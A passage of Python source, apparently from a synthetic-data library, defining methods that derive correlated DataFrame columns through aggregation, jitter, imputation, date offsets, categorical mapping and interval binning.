if not isinstance(default_action, (str, int, float, dict)):
default_action = None
rtn_values = self._apply_action(canonical, action=default_action, seed=_seed)
# deal with categories
is_category = False
if rtn_values.dtype.name == 'category':
is_category = True
rtn_values = rtn_values.astype('object')
rtn_values.update(self._apply_action(canonical, action=action, select_idx=select_idx, seed=_seed))
if is_category:
rtn_values = rtn_values.astype('category')
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
rtn_values = rtn_values.astype(rtn_type)
return rtn_values
return rtn_values.to_list()
def _correlate_custom(self, canonical: Any, code_str: str, seed: int=None, **kwargs):
""" Commonly used for custom list comprehension, takes code string that when evaluated returns a list of values
When referencing the canonical in the code_str it should be referenced either by use parameter label 'canonical'
or the short cut '@' symbol.
for example:
code_str = "[x + 2 for x in @['A']]" # where 'A' is a header in the canonical
kwargs can also be passed into the code string but must be preceded by a '$' symbol
for example:
code_str = "[True if x == $v1 else False for x in @['A']]" # where 'v1' is a kwargs
:param canonical: a pd.DataFrame as the reference dataframe
:param code_str: an action on those column values. to reference the canonical use '@'
:param seed: (optional) a seed value for the random function: default to None
:param kwargs: a set of kwargs to include in any executable function
:return: a list (optionally a pd.DataFrame
"""
canonical = self._get_canonical(canonical)
_seed = seed if isinstance(seed, int) else self._seed()
local_kwargs = locals()
for k, v in local_kwargs.pop('kwargs', {}).items():
local_kwargs.update({k: v})
code_str = code_str.replace(f'${k}', str(v))
code_str = code_str.replace('@', 'canonical')
rtn_values = eval(code_str, globals(), local_kwargs)
if rtn_values is None:
return [np.nan] * canonical.shape[0]
return rtn_values
def _correlate_aggregate(self, canonical: Any, headers: list, agg: str, seed: int=None, precision: int=None,
rtn_type: str=None):
""" correlate two or more columns with each other through a finite set of aggregation functions. The
aggregation function names are limited to 'sum', 'prod', 'count', 'min', 'max' and 'mean' for numeric columns
and a special 'list' function name to combine the columns as a list
:param canonical: a pd.DataFrame as the reference dataframe
:param headers: a list of headers to correlate
:param agg: the aggregation function name enact. The available functions are:
'sum', 'prod', 'count', 'min', 'max', 'mean' and 'list' which combines the columns as a list
:param precision: the value precision of the return values
:param seed: (optional) a seed value for the random function: default to None
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: a list of equal length to the one passed
"""
canonical = self._get_canonical(canonical)
if not isinstance(headers, list) or len(headers) < 2:
raise ValueError("The headers value must be a list of at least two header str")
if agg not in ['sum', 'prod', 'count', 'min', 'max', 'mean', 'list']:
raise ValueError("The only allowed func values are 'sum', 'prod', 'count', 'min', 'max', 'mean', 'list'")
# Code block for intent
_seed = seed if isinstance(seed, int) else self._seed()
precision = precision if isinstance(precision, int) else 3
if agg == 'list':
return canonical.loc[:, headers].values.tolist()
rtn_values = eval(f"canonical.loc[:, headers].{agg}(axis=1)", globals(), locals()).round(precision)
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
rtn_values = rtn_values.astype(rtn_type)
return rtn_values
return rtn_values.to_list()
def _correlate_choice(self, canonical: Any, header: str, list_size: int=None, random_choice: bool=None,
replace: bool=None, shuffle: bool=None, convert_str: bool=None, seed: int=None,
rtn_type: str=None):
""" correlate a column where the elements of the columns contains a list, and a choice is taken from that list.
if the list_size == 1 then a single value is correlated otherwise a list is correlated
Null values are passed through but all other elements must be a list with at least 1 value in.
if 'random' is true then all returned values will be a random selection from the list and of equal length.
if 'random' is false then each list will not exceed the 'list_size'
Also if 'random' is true and 'replace' is False then all lists must have more elements than the list_size.
By default 'replace' is True and 'shuffle' is False.
In addition 'convert_str' allows lists that have been formatted as a string can be converted from a string
to a list using 'ast.literal_eval(x)'
:param canonical: a pd.DataFrame as the reference dataframe
:param header: The header containing a list to chose from.
:param list_size: (optional) the number of elements to return, if more than 1 then list
:param random_choice: (optional) if the choice should be a random choice.
:param replace: (optional) if the choice selection should be replaced or selected only once
:param shuffle: (optional) if the final list should be shuffled
:param convert_str: if the header has the list as a string convert to list using ast.literal_eval()
:param seed: (optional) a seed value for the random function: default to None
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: a list of equal length to the one passed
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
# Code block for intent
list_size = list_size if isinstance(list_size, int) else 1
random_choice = random_choice if isinstance(random_choice, bool) else False
convert_str = convert_str if isinstance(convert_str, bool) else False
replace = replace if isinstance(replace, bool) else True
shuffle = shuffle if isinstance(shuffle, bool) else False
_seed = seed if isinstance(seed, int) else self._seed()
s_values = canonical[header].copy()
if s_values.empty:
return list()
s_idx = s_values.where(~s_values.isna()).dropna().index
if convert_str:
s_values.iloc[s_idx] = [ast.literal_eval(x) if isinstance(x, str) else x for x in s_values.iloc[s_idx]]
s_values.iloc[s_idx] = Commons.list_formatter(s_values.iloc[s_idx])
generator = np.random.default_rng(seed=_seed)
if random_choice:
try:
s_values.iloc[s_idx] = [generator.choice(x, size=list_size, replace=replace, shuffle=shuffle)
for x in s_values.iloc[s_idx]]
except ValueError:
raise ValueError(f"Unable to make a choice. Ensure {header} has all appropriate values for the method")
s_values.iloc[s_idx] = [x[0] if list_size == 1 else list(x) for x in s_values.iloc[s_idx]]
else:
s_values.iloc[s_idx] = [x[:list_size] if list_size > 1 else x[0] for x in s_values.iloc[s_idx]]
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
s_values = s_values.astype(rtn_type)
return s_values
return s_values.to_list()
def _correlate_join(self, canonical: Any, header: str, action: [str, dict], sep: str=None, seed: int=None,
rtn_type: str=None):
""" correlate a column and join it with the result of the action, This allows for composite values to be
build from. an example might be to take a forename and add the surname with a space separator to create a
composite name field, of to join two primary keys to create a single composite key.
:param canonical: a pd.DataFrame as the reference dataframe
:param header: an ordered list of columns to join
:param action: (optional) a string or a single action whose outcome will be joined to the header value
:param sep: (optional) a separator between the values
:param seed: (optional) a seed value for the random function: default to None
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: a list of equal length to the one passed
Actions are the resulting outcome of the selection (or the default). An action can be just a value or a dict
that executes a intent method such as get_number(). To help build actions there is a helper function called
action2dict(...) that takes a method as a mandatory attribute.
With actions there are special keyword 'method' values:
@header: use a column as the value reference, expects the 'header' key
@constant: use a value constant, expects the key 'value'
@sample: use to get sample values, expected 'name' of the Sample method, optional 'shuffle' boolean
@eval: evaluate a code string, expects the key 'code_str' and any locals() required
An example of a simple action to return a selection from a list:
{'method': 'get_category', selection=['M', 'F', 'U']
an example of using the helper method, in this example we use the keyword @header to get a value from another
column at the same index position:
inst.action2dict(method="@header", header='value')
We can even execute some sort of evaluation at run time:
inst.action2dict(method="@eval", code_str='sum(values)', values=[1,4,2,1])
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(action, (dict, str)):
raise ValueError(f"The action must be a dictionary of a single action or a string value")
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
# Code block for intent
_seed = seed if isinstance(seed, int) else self._seed()
sep = sep if isinstance(sep, str) else ''
s_values = canonical[header].copy()
if s_values.empty:
return list()
action = deepcopy(action)
null_idx = s_values[s_values.isna()].index
s_values.to_string()
result = self._apply_action(canonical, action=action, seed=_seed)
s_values = pd.Series([f"{a}{sep}{b}" for (a, b) in zip(s_values, result)], dtype='object')
if null_idx.size > 0:
s_values.iloc[null_idx] = np.nan
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
s_values = s_values.astype(rtn_type)
return s_values
return s_values.to_list()
def _correlate_sigmoid(self, canonical: Any, header: str, precision: int=None, seed: int=None,
rtn_type: str=None):
""" logistic sigmoid a.k.a logit, takes an array of real numbers and transforms them to a value
between (0,1) and is defined as
f(x) = 1/(1+exp(-x)
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
:param precision: (optional) how many decimal places. default to 3
:param seed: (optional) the random seed. defaults to current datetime
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: an equal length list of correlated values
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
s_values = canonical[header].copy()
if s_values.empty:
return list()
precision = precision if isinstance(precision, int) else 3
_seed = seed if isinstance(seed, int) else self._seed()
rtn_values = np.round(1 / (1 + np.exp(-s_values)), precision)
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
rtn_values = rtn_values.astype(rtn_type)
return rtn_values
return rtn_values.to_list()
def _correlate_polynomial(self, canonical: Any, header: str, coefficient: list, seed: int=None,
rtn_type: str=None, keep_zero: bool=None) -> list:
""" creates a polynomial using the reference header values and apply the coefficients where the
index of the list represents the degree of the term in reverse order.
e.g [6, -2, 0, 4] => f(x) = 4x**3 - 2x + 6
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
:param coefficient: the reverse list of term coefficients
:param seed: (optional) the random seed. defaults to current datetime
:param keep_zero: (optional) if True then zeros passed remain zero, Default is False
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: an equal length list of correlated values
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
s_values = canonical[header].copy()
if s_values.empty:
return list()
keep_zero = keep_zero if isinstance(keep_zero, bool) else False
_seed = seed if isinstance(seed, int) else self._seed()
def _calc_polynomial(x, _coefficient):
if keep_zero and x == 0:
return 0
res = 0
for index, coeff in enumerate(_coefficient):
res += coeff * x ** index
return res
rtn_values = s_values.apply(lambda x: _calc_polynomial(x, coefficient))
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
rtn_values = rtn_values.astype(rtn_type)
return rtn_values
return rtn_values.to_list()
def _correlate_missing(self, canonical: Any, header: str, granularity: [int, float]=None,
as_type: str=None, lower: [int, float]=None, upper: [int, float]=None, nulls_list: list=None,
exclude_dominant: bool=None, replace_zero: [int, float]=None, precision: int=None,
day_first: bool=None, year_first: bool=None, seed: int=None,
rtn_type: str=None):
""" imputes missing data with a weighted distribution based on the analysis of the other elements in the
column
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
:param granularity: (optional) the granularity of the analysis across the range. Default is 5
int passed - represents the number of periods
float passed - the length of each interval
list[tuple] - specific interval periods e.g []
list[float] - the percentile or quantities, All should fall between 0 and 1
:param as_type: (optional) specify the type to analyse
:param lower: (optional) the lower limit of the number value. Default min()
:param upper: (optional) the upper limit of the number value. Default max()
:param nulls_list: (optional) a list of nulls that should be considered null
:param exclude_dominant: (optional) if overly dominant are to be excluded from analysis to avoid bias (numbers)
:param replace_zero: (optional) with categories, a non-zero minimal chance relative frequency to replace zero
This is useful when the relative frequency of a category is so small the analysis returns zero
:param precision: (optional) by default set to 3.
:param day_first: (optional) if the date provided has day first
:param year_first: (optional) if the date provided has year first
:param seed: (optional) the random seed. defaults to current datetime
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return:
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
s_values = canonical[header].copy()
if s_values.empty:
return list()
as_type = as_type if isinstance(as_type, str) else s_values.dtype.name
_seed = seed if isinstance(seed, int) else self._seed()
nulls_list = nulls_list if isinstance(nulls_list, list) else [np.nan, None, 'nan', '', ' ']
if isinstance(nulls_list, list):
s_values.replace(nulls_list, np.nan, inplace=True, regex=True)
null_idx = s_values[s_values.isna()].index
if as_type.startswith('int') or as_type.startswith('float') or as_type.startswith('num'):
_analysis = DataAnalytics(DataDiscovery.analyse_number(s_values, granularity=granularity, lower=lower,
upper=upper, detail_stats=False, precision=precision,
exclude_dominant=exclude_dominant))
s_values.iloc[null_idx] = self._get_intervals(intervals=[tuple(x) for x in _analysis.intent.intervals],
relative_freq=_analysis.patterns.relative_freq,
precision=_analysis.params.precision,
seed=_seed, size=len(null_idx))
elif as_type.startswith('cat'):
_analysis = DataAnalytics(DataDiscovery.analyse_category(s_values, replace_zero=replace_zero))
s_values.iloc[null_idx] = self._get_category(selection=_analysis.intent.categories,
relative_freq=_analysis.patterns.relative_freq,
seed=_seed, size=len(null_idx))
elif as_type.startswith('date'):
_analysis = DataAnalytics(DataDiscovery.analyse_date(s_values, granularity=granularity, lower=lower,
upper=upper, day_first=day_first,
year_first=year_first))
s_values.iloc[null_idx] = self._get_datetime(start=_analysis.intent.lowest,
until=_analysis.intent.highest,
relative_freq=_analysis.patterns.relative_freq,
date_format=_analysis.params.data_format,
day_first=_analysis.params.day_first,
year_first=_analysis.params.year_first,
seed=_seed, size=len(null_idx))
else:
raise ValueError(f"The data type '{as_type}' is not supported. Try using the 'as_type' parameter")
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
s_values = s_values.astype(rtn_type)
return s_values
return s_values.to_list()
def _correlate_numbers(self, canonical: Any, header: str, to_numeric: bool=None, standardize: bool=None,
normalize: tuple=None, offset: [int, float, str]=None, jitter: float=None,
jitter_freq: list=None, precision: int=None, replace_nulls: [int, float]=None,
seed: int=None, keep_zero: bool=None, min_value: [int, float]=None,
max_value: [int, float]=None, rtn_type: str=None):
""" returns a number that correlates to the value given. The jitter is based on a normal distribution
with the correlated value being the mean and the jitter its standard deviation from that mean
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
:param to_numeric: (optional) ensures numeric type. None convertable strings are set to null
:param standardize: (optional) if the column should be standardised
:param normalize: (optional) normalise the column between two values. the tuple is the lower and upper bounds
:param offset: (optional) a fixed value to offset or if str an operation to perform using @ as the header value.
:param jitter: (optional) a perturbation of the value where the jitter is a std. defaults to 0
:param jitter_freq: (optional) a relative freq with the pattern mid point the mid point of the jitter
:param precision: (optional) how many decimal places. default to 3
:param replace_nulls: (optional) a numeric value to replace nulls
:param seed: (optional) the random seed. defaults to current datetime
:param keep_zero: (optional) if True then zeros passed remain zero, Default is False
:param min_value: a minimum value not to go below
:param max_value: a max value not to go above
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: an equal length list of correlated values
The offset can be a numeric offset that is added to the value, e.g. passing 2 will add 2 to all values.
If a string is passed if format should be a calculation with the '@' character used to represent the column
value. e.g.
'1-@' would subtract the column value from 1,
'@*0.5' would multiply the column value by 0.5
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
s_values = canonical[header].copy()
if s_values.empty:
return list()
if isinstance(to_numeric, bool) and to_numeric:
s_values = pd.to_numeric(s_values.apply(str).str.replace('[$£€, ]', '', regex=True), errors='coerce')
if not (s_values.dtype.name.startswith('int') or s_values.dtype.name.startswith('float')):
raise ValueError(f"The header column is of type '{s_values.dtype.name}' and not numeric. "
f"Use the 'to_numeric' parameter if appropriate")
keep_zero = keep_zero if isinstance(keep_zero, bool) else False
precision = precision if isinstance(precision, int) else 3
_seed = seed if isinstance(seed, int) else self._seed()
if isinstance(replace_nulls, (int, float)):
s_values[s_values.isna()] = replace_nulls
null_idx = s_values[s_values.isna()].index
zero_idx = s_values.where(s_values == 0).dropna().index if keep_zero else []
if isinstance(offset, (int, float)) and offset != 0:
s_values = s_values.add(offset)
elif isinstance(offset, str):
offset = offset.replace("@", 'x')
s_values = s_values.apply(lambda x: eval(offset))
if isinstance(jitter, (int, float)) and jitter != 0:
sample = self._get_number(-abs(jitter) / 2, abs(jitter) / 2, relative_freq=jitter_freq,
size=s_values.size, seed=_seed)
s_values = s_values.add(sample)
if isinstance(min_value, (int, float)):
if min_value < s_values.max():
min_idx = s_values.dropna().where(s_values < min_value).dropna().index
s_values.iloc[min_idx] = min_value
else:
raise ValueError(f"The min value {min_value} is greater than the max result value {s_values.max()}")
if isinstance(max_value, (int, float)):
if max_value > s_values.min():
max_idx = s_values.dropna().where(s_values > max_value).dropna().index
s_values.iloc[max_idx] = max_value
else:
raise ValueError(f"The max value {max_value} is less than the min result value {s_values.min()}")
if isinstance(standardize, bool) and standardize:
s_values = pd.Series(Commons.list_standardize(s_values.to_list()))
if isinstance(normalize, tuple):
if normalize[0] >= normalize[1] or len(normalize) != 2:
raise ValueError("The normalize tuple must be of size 2 with the first value lower than the second")
s_values = pd.Series(Commons.list_normalize(s_values.to_list(), normalize[0], normalize[1]))
# reset the zero values if any
s_values.iloc[zero_idx] = 0
s_values = s_values.round(precision)
if precision == 0 and not s_values.isnull().any():
s_values = s_values.astype(int)
if null_idx.size > 0:
s_values.iloc[null_idx] = np.nan
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
s_values = s_values.astype(rtn_type)
return s_values
return s_values.to_list()
def _correlate_categories(self, canonical: Any, header: str, correlations: list, actions: dict,
default_action: [str, int, float, dict]=None, seed: int=None, rtn_type: str=None):
""" correlation of a set of values to an action, the correlations must map to the dictionary index values.
Note. to use the current value in the passed values as a parameter value pass an empty dict {} as the keys
value. If you want the action value to be the current value of the passed value then again pass an empty dict
action to be the current value
simple correlation list:
['A', 'B', 'C'] # if values is 'A' then action is 0 and so on
multiple choice correlation:
[['A','B'], 'C'] # if values is 'A' OR 'B' then action is 0 and so on
For more complex correlation the selection logic can be used, see notes below.
for actions also see notes below.
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
:param correlations: a list of categories (can also contain lists for multiple correlations.
:param actions: the correlated set of categories that should map to the index
:param default_action: (optional) a default action to take if the selection is not fulfilled
:param seed: a seed value for the random function: default to None
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: a list of equal length to the one passed
Selections are a list of dictionaries of conditions and optional additional parameters to filter.
To help build conditions there is a static helper method called 'select2dict(...)' that has parameter
options available to build a condition.
An example of a condition with the minimum requirements is
[{'column': 'genre', 'condition': "=='Comedy'"}]
an example of using the helper method
selection = [inst.select2dict(column='gender', condition="=='M'"),
inst.select2dict(column='age', condition=">65", logic='XOR')]
Using the 'select2dict' method ensure the correct keys are used and the dictionary is properly formed. It also
helps with building the logic that is executed in order
Actions are the resulting outcome of the selection (or the default). An action can be just a value or a dict
that executes a intent method such as get_number(). To help build actions there is a helper function called
action2dict(...) that takes a method as a mandatory attribute.
With actions there are special keyword 'method' values:
@header: use a column as the value reference, expects the 'header' key
@constant: use a value constant, expects the key 'value'
@sample: use to get sample values, expected 'name' of the Sample method, optional 'shuffle' boolean
@eval: evaluate a code string, expects the key 'code_str' and any locals() required
An example of a simple action to return a selection from a list:
{'method': 'get_category', selection: ['M', 'F', 'U']}
This same action using the helper method would look like:
inst.action2dict(method='get_category', selection=['M', 'F', 'U'])
an example of using the helper method, in this example we use the keyword @header to get a value from another
column at the same index position:
inst.action2dict(method="@header", header='value')
We can even execute some sort of evaluation at run time:
inst.action2dict(method="@eval", code_str='sum(values)', values=[1,4,2,1])
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
_seed = seed if isinstance(seed, int) else self._seed()
actions = deepcopy(actions)
correlations = deepcopy(correlations)
corr_list = []
for corr in correlations:
corr_list.append(Commons.list_formatter(corr))
if not isinstance(default_action, (str, int, float, dict)):
default_action = None
rtn_values = self._apply_action(canonical, action=default_action, seed=_seed)
# deal with categories
if rtn_values.dtype.name == 'category':
rtn_values = rtn_values.astype('object')
s_values = canonical[header].copy().astype(str)
for i in range(len(corr_list)):
action = actions.get(i, actions.get(str(i), -1))
if action == -1:
continue
if isinstance(corr_list[i][0], dict):
corr_idx = self._selection_index(canonical, selection=corr_list[i])
else:
corr_idx = s_values[s_values.isin(map(str, corr_list[i]))].index
rtn_values.update(self._apply_action(canonical, action=action, select_idx=corr_idx, seed=_seed))
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
rtn_values = rtn_values.astype(rtn_type)
return rtn_values
return rtn_values.to_list()
def _correlate_dates(self, canonical: Any, header: str, offset: [int, dict]=None, jitter: int=None,
jitter_units: str=None, jitter_freq: list=None, now_delta: str=None, date_format: str=None,
min_date: str=None, max_date: str=None, fill_nulls: bool=None, day_first: bool=None,
year_first: bool=None, seed: int=None, rtn_type: str=None):
""" correlates dates to an existing date or list of dates. The return is a list of pd
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
:param offset: (optional) and offset to the date. if int then assumed a 'days' offset
int or dictionary associated with pd. eg {'days': 1}
:param jitter: (optional) the random jitter or deviation in days
:param jitter_units: (optional) the units of the jitter, Options: 'W', 'D', 'h', 'm', 's'. default 'D'
:param jitter_freq: (optional) a relative freq with the pattern mid point the mid point of the jitter
:param now_delta: (optional) returns a delta from now as an int list, Options: 'Y', 'M', 'W', 'D', 'h', 'm', 's'
:param min_date: (optional)a minimum date not to go below
:param max_date: (optional)a max date not to go above
:param fill_nulls: (optional) if no date values should remain untouched or filled based on the list mode date
:param day_first: (optional) if the dates given are day first format. Default to True
:param year_first: (optional) if the dates given are year first. Default to False
:param date_format: (optional) the format of the output
:param seed: (optional) a seed value for the random function: default to None
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: a list of equal size to that given
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
values = canonical[header].copy()
if values.empty:
return list()
def _clean(control):
_unit_type = ['years', 'months', 'weeks', 'days', 'leapdays', 'hours', 'minutes', 'seconds']
_params = {}
if isinstance(control, int):
control = {'days': control}
if isinstance(control, dict):
for k, v in control.items():
if k not in _unit_type:
raise ValueError(f"The key '{k}' in 'offset', is not a recognised unit type for pd.DateOffset")
return control
_seed = self._seed() if seed is None else seed
fill_nulls = False if fill_nulls is None or not isinstance(fill_nulls, bool) else fill_nulls
offset = _clean(offset) if isinstance(offset, (dict, int)) else None
if isinstance(now_delta, str) and now_delta not in ['Y', 'M', 'W', 'D', 'h', 'm', 's']:
raise ValueError(f"the now_delta offset unit '{now_delta}' is not recognised "
f"use of of ['Y', 'M', 'W', 'D', 'h', 'm', 's']")
units_allowed = ['W', 'D', 'h', 'm', 's']
jitter_units = jitter_units if isinstance(jitter_units, str) and jitter_units in units_allowed else 'D'
jitter = pd.Timedelta(value=jitter, unit=jitter_units) if isinstance(jitter, int) else None
# set minimum date
_min_date = pd.to_datetime(min_date, errors='coerce', infer_datetime_format=True, utc=True)
if _min_date is None or _min_date is pd.NaT:
_min_date = pd.to_datetime(pd.Timestamp.min, utc=True)
# set max date
_max_date = pd.to_datetime(max_date, errors='coerce', infer_datetime_format=True, utc=True)
if _max_date is None or _max_date is pd.NaT:
_max_date = pd.to_datetime(pd.Timestamp.max, utc=True)
if _min_date >= _max_date:
raise ValueError(f"the min_date {min_date} must be less than max_date {max_date}")
# convert values into datetime
s_values = pd.Series(pd.to_datetime(values.copy(), errors='coerce', infer_datetime_format=True,
dayfirst=day_first, yearfirst=year_first, utc=True))
if jitter is not None:
if jitter_units in ['W', 'D']:
value = jitter.days
zip_units = 'D'
else:
value = int(jitter.to_timedelta64().astype(int) / 1000000000)
zip_units = 's'
zip_spread = self._get_number(-abs(value) / 2, (abs(value + 1) / 2), relative_freq=jitter_freq,
precision=0, size=s_values.size, seed=_seed)
zipped_dt = list(zip(zip_spread, [zip_units]*s_values.size))
s_values += np.array([pd.Timedelta(x, y).to_timedelta64() for x, y in zipped_dt])
if fill_nulls:
generator = np.random.default_rng(seed=_seed)
s_values = s_values.fillna(generator.choice(s_values.mode()))
null_idx = s_values[s_values.isna()].index
if isinstance(offset, dict) and offset:
s_values = s_values.add(pd.DateOffset(**offset))
if _min_date > pd.to_datetime(pd.Timestamp.min, utc=True):
if _min_date > s_values.min():
min_idx = s_values.dropna().where(s_values < _min_date).dropna().index
s_values.iloc[min_idx] = _min_date
else:
raise ValueError(f"The min value {min_date} is greater than the max result value {s_values.max()}")
if _max_date < pd.to_datetime(pd.Timestamp.max, utc=True):
if _max_date < s_values.max():
max_idx = s_values.dropna().where(s_values > _max_date).dropna().index
s_values.iloc[max_idx] = _max_date
else:
raise ValueError(f"The max value {max_date} is less than the min result value {s_values.min()}")
if now_delta:
s_values = (s_values.dt.tz_convert(None) - pd.Timestamp('now')).abs()
s_values = (s_values / np.timedelta64(1, now_delta))
s_values = s_values.round(0) if null_idx.size > 0 else s_values.astype(int)
else:
if isinstance(date_format, str):
s_values = s_values.dt.strftime(date_format)
else:
s_values = s_values.dt.tz_convert(None)
if null_idx.size > 0:
s_values.iloc[null_idx].apply(lambda x: np.nan)
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
s_values = s_values.astype(rtn_type)
return s_values
return s_values.to_list()
def _correlate_discrete(self, canonical: Any, header: str, granularity: [int, float, list]=None,
lower: [int, float]=None, upper: [int, float]=None, categories: list=None,
precision: int=None, seed: int=None) -> list:
""" converts continuous representation into discrete representation through interval categorisation
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
:param granularity: (optional) the granularity of the analysis across the range. Default is 3
int passed - represents the number of periods
float passed - the length of each interval
list[tuple] - specific interval periods e.g []
list[float] - the percentile or quantities, All should fall between 0 and 1
:param lower: (optional) the lower limit of the number value. Default min()
:param upper: (optional) the upper limit of the number value. Default max()
:param precision: (optional) The precision of the range and boundary values. by default set to 5.
:param categories:(optional) a set of labels the same length as the intervals to name the categories
:return: a list of equal size to that given
"""
# exceptions check
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
_seed = seed if isinstance(seed, int) else self._seed()
# intend code block on the canonical
granularity = 3 if not isinstance(granularity, (int, float, list)) or granularity == 0 else granularity
precision = precision if isinstance(precision, int) else 5
# firstly get the granularity
lower = canonical[header].min() if not isinstance(lower, (int, float)) else lower
upper = canonical[header].max() if not isinstance(upper, (int, float)) else upper
if lower >= upper:
upper = lower
granularity = [(lower, upper, 'both')]
if isinstance(granularity, (int, float)):
# if granularity float then convert frequency to intervals
if isinstance(granularity, float):
# make sure frequency goes beyond the upper
_end = upper + granularity - (upper % granularity)
periods = pd.interval_range(start=lower, end=_end, freq=granularity).drop_duplicates()
periods = periods.to_tuples().to_list()
granularity = []
while len(periods) > 0:
period = periods.pop(0)
if len(periods) == 0:
granularity += [(period[0], period[1], 'both')]
else:
granularity += [(period[0], period[1], 'left')]
# if granularity int then convert periods to intervals
else:
periods = pd.interval_range(start=lower, end=upper, periods=granularity).drop_duplicates()
granularity = periods.to_tuples().to_list()
if isinstance(granularity, list):
if all(isinstance(value, tuple) for value in granularity):
if len(granularity[0]) == 2:
granularity[0] = (granularity[0][0], granularity[0][1], 'both')
granularity = [(t[0], t[1], 'right') if len(t) == 2 else t for t in granularity]
elif all(isinstance(value, float) and 0 < value < 1 for value in granularity):
quantiles = list(set(granularity + [0, 1.0]))
boundaries = canonical[header].quantile(quantiles).values
boundaries.sort()
granularity = [(boundaries[0], boundaries[1], 'both')]
granularity += [(boundaries[i - 1], boundaries[i], 'right') for i in range(2, boundaries.size)]
else:
granularity = (lower, upper, 'both')
granularity = [(np.round(p[0], precision), np.round(p[1], precision), p[2]) for p in granularity]
# now create the categories
conditions = []
for interval in granularity:
lower, upper, closed = interval
if str.lower(closed) == 'neither':
conditions.append((canonical[header] > lower) & (canonical[header] < upper))
elif str.lower(closed) == 'right':
conditions.append((canonical[header] > lower) & (canonical[header] <= upper))
elif str.lower(closed) == 'both':
conditions.append((canonical[header] >= lower) & (canonical[header] <= upper))
else:
conditions.append((canonical[header] >= lower) & (canonical[header] < upper))
if isinstance(categories, list) and len(categories) == len(conditions):
choices = categories
else:
if canonical[header].dtype.name.startswith('int'):
choices = [f"{int(i[0])}->{int(i[1])}" for i in granularity]
else:
choices = [f"{i[0]}->{i[1]}" for i in granularity]
# noinspection PyTypeChecker
return np.select(conditions, choices, default="<NA>").tolist()
"""
UTILITY METHODS SECTION
"""
@staticmethod
def _convert_date2value(dates: Any, day_first: bool = True, year_first: bool = False):
values = pd.to_datetime(dates, errors='coerce', infer_datetime_format=True, dayfirst=day_first,
yearfirst=year_first)
return mdates.date2num(pd.Series(values)).tolist()
@staticmethod
def _convert_value2date(values: Any, date_format: str=None):
dates = []
for date in mdates.num2date(values):
date = pd.Timestamp(date)
if isinstance(date_format, str):
date = date.strftime(date_format)
dates.append(date)
return dates
@staticmethod
def _freq_dist_size(relative_freq: list, size: int, seed: int=None):
""" utility method taking a list of relative frequencies and based on size returns the size distribution
of element based on the frequency. The distribution is based upon binomial distributions
:param relative_freq: a list of int or float values representing a relative distribution frequency
:param size: the size to be distributed
:param seed: (optional) a seed value for the random function: default to None
